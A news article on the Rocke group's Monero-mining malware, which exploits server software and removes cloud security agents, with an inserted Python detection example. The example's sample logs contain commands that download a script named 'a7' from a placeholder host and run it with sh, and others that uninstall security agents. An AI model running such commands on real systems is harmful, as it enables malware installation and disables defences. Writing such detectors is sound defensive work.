A recently observed form of malware uses a new trick to avoid detection while mining cryptocurrency on cloud servers.
Two researchers at the computer security company Palo Alto Networks, Xingyu Jin and Claud Xiao, released a report on Thursday stating that malware from a threat actor dubbed the Rocke group is targeting public cloud infrastructure. Once downloaded, the malware needs administrative control to first uninstall cloud security products and then inject code that mines the cryptocurrency monero.
The researchers found that the Rocke malware injected code to uninstall five different cloud security products from infected Linux servers, including offerings from the leading Chinese cloud providers Alibaba and Tencent. Adding insult to injury, the malware follows the uninstallation steps defined in the products' user manuals.
To do its malevolent work, the Rocke group exploits vulnerabilities in the Apache Struts 2, Oracle WebLogic and Adobe ColdFusion applications, then downloads a shell script called "a7". This script targets rival crypto-miners, hides the signs of its presence and disables security programs.
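The sequence described above (a script download followed by the removal of a cloud security agent on the same host) is something a defender can look for in process-execution logs. The following is an added detection example written for this article; it is not code from the article, from Palo Alto Networks or from the Rocke malware. The log format, the host names and the agent/service names (`cloud-security-agent`, `host-guard-agent`) are constructed placeholders, and the only page-derived indicator is the script name "a7".

```python
"""Added example (not from the article or Palo Alto Networks): flag hosts whose
process-execution logs show a download of a script named 'a7' followed by the
uninstallation or shutdown of a cloud security agent.
All log lines, host names and agent names below are constructed for illustration."""
import re
from collections import defaultdict

# Assumed placeholder names of cloud security agents to watch for; replace with the
# real package/service names of the products deployed in your environment.
WATCHED_AGENTS = ("cloud-security-agent", "host-guard-agent")

# Constructed sample lines in a simplified "<timestamp> <host> exec: <command>" format.
SAMPLE_LOGS = [
    "2019-01-17T10:00:01 web-01 exec: /usr/bin/curl -fsSL http://example.invalid/a7 -o /tmp/a7",
    "2019-01-17T10:00:02 web-01 exec: /bin/sh /tmp/a7",
    "2019-01-17T10:00:03 web-01 exec: /usr/local/cloud-security-agent/uninstall.sh",
    "2019-01-17T10:00:04 web-01 exec: systemctl stop host-guard-agent",
    "2019-01-17T10:05:00 db-02 exec: /usr/bin/curl -fsSL https://example.invalid/update.tar.gz -o /tmp/u.tgz",
    "2019-01-17T10:06:00 db-02 exec: apt-get remove -y host-guard-agent",
    "2019-01-17T10:07:00 app-03 exec: /usr/bin/wget http://example.invalid/a7 -O /tmp/a7",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+exec:\s+(?P<cmd>.+)$")

# Stage 1: a curl/wget fetch of a URL whose last path element is "a7".
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b.*\bhttps?://\S*/a7\b")

# Stage 2: package removal, service stop/disable, or the vendor uninstall script
# for any watched agent (the "follows the product manual" behaviour in the article).
_agent_alt = "|".join(re.escape(a) for a in WATCHED_AGENTS)
UNINSTALL_RE = re.compile(
    rf"(?:(?:apt-get|yum|dnf|rpm|pip)\s+(?:remove|erase|purge|-e|uninstall)\b.*\b(?:{_agent_alt})\b"
    rf"|systemctl\s+(?:stop|disable)\s+(?:{_agent_alt})\b"
    rf"|/(?:{_agent_alt})/uninstall\S*)"
)


def classify(cmd: str) -> list:
    """Return the detection tags that apply to one command line."""
    tags = []
    if DOWNLOAD_RE.search(cmd):
        tags.append("script_download")
    if UNINSTALL_RE.search(cmd):
        tags.append("agent_uninstall")
    return tags


def analyze(lines) -> dict:
    """Group tagged events per host; a host is flagged only when both stages appear,
    which keeps a routine agent upgrade (stage 2 alone) from raising an alert."""
    per_host = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        for tag in classify(m["cmd"]):
            per_host[m["host"]].append((m["ts"], tag, m["cmd"]))
    report = {}
    for host, events in per_host.items():
        stages = {tag for _, tag, _ in events}
        report[host] = {
            "events": events,
            "flagged": {"script_download", "agent_uninstall"} <= stages,
        }
    return report


if __name__ == "__main__":
    for host, info in analyze(SAMPLE_LOGS).items():
        status = "FLAGGED" if info["flagged"] else "ok"
        print(f"{host}: {status} ({len(info['events'])} matching events)")
```

On the constructed sample, only `web-01` is flagged: it shows both the script download and two agent-removal actions, while `db-02` (an agent removal with no suspicious download) and `app-03` (a download with no removal) are reported but not flagged. The two-stage rule is the design point: either event on its own is common during legitimate administration, and it is the combination on one host that matches the behaviour the researchers describe.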
The researchers add:
"To our knowledge, this is the first malware family that has developed the unique ability to detect and remove cloud security products."
The Rocke group's malware was first discovered by IT giant Cisco's Talos Intelligence Group in August. At the time, Talos researcher David Liebenberg said that Rocke "will continue to exploit the Git repositories to download and perform illicit mining on victim machines".
Back in November, research by the Israel-based information security company Check Point Software Technologies showed that a monero-mining malware dubbed KingMiner was evolving over time to avoid detection.
Monero remains by far the most popular cryptocurrency among hackers. Last week, a study by academic researchers showed that hackers have mined at least 4.32 percent of all monero in circulation.
A McAfee study published in December showed that cryptocurrency malware threats grew by 4,000 percent last year.